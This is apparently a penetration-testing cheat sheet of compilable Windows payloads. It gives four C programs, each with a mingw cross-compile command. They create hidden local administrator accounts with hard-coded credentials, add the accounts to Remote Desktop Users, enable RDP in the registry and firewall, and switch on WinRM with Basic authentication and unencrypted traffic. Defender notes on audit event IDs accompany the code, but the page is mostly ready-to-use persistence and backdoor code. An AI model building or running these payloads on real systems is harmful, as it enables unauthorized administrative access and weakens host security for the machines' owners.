Windows Compilable Payloads
Simple payload that creates a local account and adds it to the local Administrators group. You're unlikely to use something this simple unless you have access as another user via RDP.
#include <stdlib.h>
/*
 * Creates a local account and puts it in the local Administrators group by
 * handing two `net` commands to system(), which runs them through the
 * command interpreter.
 *
 * The exit status of each command is discarded and the program always
 * returns 0, so the exit code does not show whether either step worked.
 *
 * Defender notes: the account name and password are plain string literals,
 * so they are readable in the compiled binary and in any process-creation
 * logging that records command lines. With account-management auditing
 * enabled, the new account and the group change are recorded in the
 * Security log (event IDs 4720 and 4732).
 */
int main ()
{
    static const char *const steps[] = {
        "net user dave2 password123! /add",          /* create the account */
        "net localgroup administrators dave2 /add",  /* add it to Administrators */
    };
    size_t k;

    /* Run every step in order; results are intentionally not inspected. */
    for (k = 0; k < sizeof steps / sizeof steps[0]; k++) {
        (void) system (steps[k]);
    }

    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Add a user with RDP access
#include <stdlib.h>
/*
 * Creates a local account, then adds it to the local Administrators group
 * and to "Remote Desktop Users", by handing three `net` commands to
 * system().
 *
 * The exit status of each command is discarded and the program always
 * returns 0, so the exit code does not show whether any step worked.
 *
 * Defender notes: the credentials are plain string literals and therefore
 * visible in the binary and in command-line process logging. With
 * account-management auditing enabled, the account creation is recorded as
 * Security event 4720 and each local group addition as event 4732; an
 * unexpected new member of "Remote Desktop Users" is worth alerting on.
 */
int main ()
{
    static const char *const steps[] = {
        "net user dave3 password123! /add",                      /* create the account */
        "net localgroup administrators dave3 /add",              /* local admin rights */
        "net localgroup \"Remote Desktop Users\" dave3 /add",    /* RDP logon group */
    };
    size_t k;

    /* Run every step in order; results are intentionally not inspected. */
    for (k = 0; k < sizeof steps / sizeof steps[0]; k++) {
        (void) system (steps[k]);
    }

    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Useful for enabling RDP if it hasn't been enabled already
#include <stdlib.h>
/*
 * Turns on Remote Desktop and then creates an administrator account that is
 * allowed to use it. Five commands are passed to system() in order:
 *
 *   1. reg add   - sets fDenyTSConnections to 0 under the Terminal Server
 *                  key, which allows incoming RDP connections
 *   2. netsh     - enables the "remote desktop" firewall rule group
 *   3-5. net     - creates the account and adds it to Administrators and
 *                  "Remote Desktop Users"
 *
 * The exit status of each command is discarded and the program always
 * returns 0, so the exit code does not show whether any step worked.
 *
 * Defender notes: the registry and firewall changes persist after the
 * program exits and are a host-configuration change in their own right.
 * Monitoring writes to fDenyTSConnections and changes to the Remote
 * Desktop firewall rules covers this, alongside the account events
 * (Security event IDs 4720 and 4732) and command-line process logging,
 * where the literal credentials will appear.
 */
int main ()
{
    static const char *const steps[] = {
        "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f",
        "netsh advfirewall firewall set rule group=\"remote desktop\" new enable=Yes",
        "net user dave3 password123! /add",
        "net localgroup administrators dave3 /add",
        "net localgroup \"Remote Desktop Users\" dave3 /add",
        NULL  /* end-of-list marker */
    };
    const char *const *step;

    /* Walk the list until the marker; results are intentionally not inspected. */
    for (step = steps; *step != NULL; step++) {
        (void) system (*step);
    }

    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
Enable WinRM (with Basic authentication and unencrypted traffic allowed) and add an administrator account
#include <stdlib.h>
/*
 * Enables WinRM with weakened service settings and then creates a local
 * administrator account. Five commands are passed to system() in order:
 *
 *   1. winrm quickconfig -quiet          - default WinRM setup, no prompts
 *   2. winrm set .../service/auth        - turns on Basic authentication
 *   3. winrm set .../service             - allows unencrypted traffic
 *   4-5. net                             - creates the account and adds it
 *                                          to Administrators
 *
 * The exit status of each command is discarded and the program always
 * returns 0, so the exit code does not show whether any step worked.
 *
 * Defender notes: Basic=true together with AllowUnencrypted=true leaves the
 * WinRM service accepting logons whose credentials have no transport
 * protection when sent over plain HTTP, and both settings persist after the
 * program exits. A configuration baseline check on winrm/config/service
 * catches them; the account creation and group change show up as Security
 * event IDs 4720 and 4732, and the literal credentials appear in
 * command-line process logging.
 */
int main ()
{
    static const char *const steps[] = {
        "winrm quickconfig -quiet",
        "winrm set winrm/config/service/auth @{Basic=\"true\"}",
        "winrm set winrm/config/service @{AllowUnencrypted=\"true\"}",
        "net user dave3 password123! /add",
        "net localgroup administrators dave3 /add",
        NULL  /* end-of-list marker */
    };
    const char *const *step;

    /* Walk the list until the marker; results are intentionally not inspected. */
    for (step = steps; *step != NULL; step++) {
        (void) system (*step);
    }

    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe